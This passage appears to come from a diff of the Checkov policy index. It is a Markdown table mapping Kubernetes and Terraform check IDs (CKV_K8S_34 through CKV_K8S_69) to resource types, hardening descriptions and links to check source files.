(Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2863 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 2864 | CKV_K8S_35 | resource | CronJob | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2865 | CKV_K8S_35 | resource | DaemonSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2866 | CKV_K8S_35 | resource | Deployment | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2867 | CKV_K8S_35 | resource | DeploymentConfig | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2868 | CKV_K8S_35 | resource | Job | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2869 | CKV_K8S_35 | resource | Pod | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2870 | CKV_K8S_35 | resource | PodTemplate | Prefer using secrets as files over secrets as environment variables | Kubernetes | 
[Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2871 | CKV_K8S_35 | resource | ReplicaSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2872 | CKV_K8S_35 | resource | ReplicationController | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2873 | CKV_K8S_35 | resource | StatefulSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | +| 2874 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2875 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2876 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2877 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 2878 | CKV_K8S_36 | resource | PodSecurityPolicy | Minimize the admission of containers 
with capabilities assigned | Kubernetes | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py) | +| 2879 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | +| 2880 | CKV_K8S_37 | resource | CronJob | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2881 | CKV_K8S_37 | resource | DaemonSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2882 | CKV_K8S_37 | resource | Deployment | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2883 | CKV_K8S_37 | resource | DeploymentConfig | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2884 | CKV_K8S_37 | resource | Job | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2885 | CKV_K8S_37 | resource | Pod | Minimize the admission of containers with capabilities assigned | Kubernetes | 
[MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2886 | CKV_K8S_37 | resource | PodTemplate | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2887 | CKV_K8S_37 | resource | ReplicaSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2888 | CKV_K8S_37 | resource | ReplicationController | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2889 | CKV_K8S_37 | resource | StatefulSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | +| 2890 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2891 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2892 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | 
[MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2893 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 2894 | CKV_K8S_38 | resource | CronJob | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2895 | CKV_K8S_38 | resource | DaemonSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2896 | CKV_K8S_38 | resource | Deployment | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2897 | CKV_K8S_38 | resource | Job | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2898 | CKV_K8S_38 | resource | Pod | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2899 | CKV_K8S_38 | resource | ReplicaSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | 
[ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2900 | CKV_K8S_38 | resource | ReplicationController | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2901 | CKV_K8S_38 | resource | StatefulSet | Ensure that Service Account Tokens are only mounted where necessary | Kubernetes | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py) | +| 2902 | CKV_K8S_39 | resource | CronJob | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2903 | CKV_K8S_39 | resource | DaemonSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2904 | CKV_K8S_39 | resource | Deployment | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2905 | CKV_K8S_39 | resource | DeploymentConfig | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2906 | CKV_K8S_39 | resource | Job | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | 
[AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2907 | CKV_K8S_39 | resource | Pod | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2908 | CKV_K8S_39 | resource | PodTemplate | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2909 | CKV_K8S_39 | resource | ReplicaSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2910 | CKV_K8S_39 | resource | ReplicationController | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2911 | CKV_K8S_39 | resource | StatefulSet | Do not use the CAP_SYS_ADMIN linux capability | Kubernetes | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py) | +| 2912 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2913 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | 
[AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2914 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2915 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 2916 | CKV_K8S_40 | resource | CronJob | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2917 | CKV_K8S_40 | resource | DaemonSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2918 | CKV_K8S_40 | resource | Deployment | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2919 | CKV_K8S_40 | resource | Job | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2920 | CKV_K8S_40 | resource | Pod | Containers should run as a high UID to avoid host conflict | Kubernetes | 
[RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2921 | CKV_K8S_40 | resource | ReplicaSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2922 | CKV_K8S_40 | resource | ReplicationController | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2923 | CKV_K8S_40 | resource | StatefulSet | Containers should run as a high UID to avoid host conflict | Kubernetes | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py) | +| 2924 | CKV_K8S_41 | resource | ServiceAccount | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py) | +| 2925 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 2926 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 2927 | CKV_K8S_42 | resource | ClusterRoleBinding | Ensure that default service accounts are not actively used | Kubernetes | 
[DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | +| 2928 | CKV_K8S_42 | resource | RoleBinding | Ensure that default service accounts are not actively used | Kubernetes | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py) | +| 2929 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2930 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2931 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2932 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 2933 | CKV_K8S_43 | resource | CronJob | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2934 | CKV_K8S_43 | resource | DaemonSet | Image should use digest | Kubernetes | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2935 | CKV_K8S_43 | resource | Deployment | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2936 | CKV_K8S_43 | resource | DeploymentConfig | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2937 | CKV_K8S_43 | resource | Job | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2938 | CKV_K8S_43 | resource | Pod | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2939 | CKV_K8S_43 | resource | PodTemplate | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2940 | CKV_K8S_43 | resource | ReplicaSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2941 | CKV_K8S_43 | resource | ReplicationController | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2942 | CKV_K8S_43 | resource | StatefulSet | Image should use digest | Kubernetes | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py) | +| 2943 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2944 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2945 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2946 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 2947 | CKV_K8S_44 | resource | Service | Ensure that the Tiller Service (Helm v2) is deleted | Kubernetes | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py) | +| 2948 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 2949 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 2950 | CKV_K8S_45 | resource | CronJob | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2951 | CKV_K8S_45 | resource | DaemonSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | 
[TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2952 | CKV_K8S_45 | resource | Deployment | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2953 | CKV_K8S_45 | resource | DeploymentConfig | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2954 | CKV_K8S_45 | resource | Job | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2955 | CKV_K8S_45 | resource | Pod | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2956 | CKV_K8S_45 | resource | PodTemplate | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2957 | CKV_K8S_45 | resource | ReplicaSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2958 | CKV_K8S_45 | resource | ReplicationController | Ensure the Tiller Deployment (Helm V2) 
is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2959 | CKV_K8S_45 | resource | StatefulSet | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster | Kubernetes | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py) | +| 2960 | CKV_K8S_49 | resource | ClusterRole | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | +| 2961 | CKV_K8S_49 | resource | Role | Minimize wildcard use in Roles and ClusterRoles | Kubernetes | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py) | +| 2962 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2963 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2964 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2965 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 2966 | 
CKV_K8S_68 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2967 | CKV_K8S_68 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2968 | CKV_K8S_68 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2969 | CKV_K8S_68 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2970 | CKV_K8S_68 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2971 | CKV_K8S_68 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2972 | CKV_K8S_68 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2973 | CKV_K8S_68 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | 
[ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2974 | CKV_K8S_68 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2975 | CKV_K8S_68 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | +| 2976 | CKV_K8S_69 | resource | CronJob | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2977 | CKV_K8S_69 | resource | DaemonSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2978 | CKV_K8S_69 | resource | Deployment | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2979 | CKV_K8S_69 | resource | DeploymentConfig | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2980 | CKV_K8S_69 | resource | Job | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 
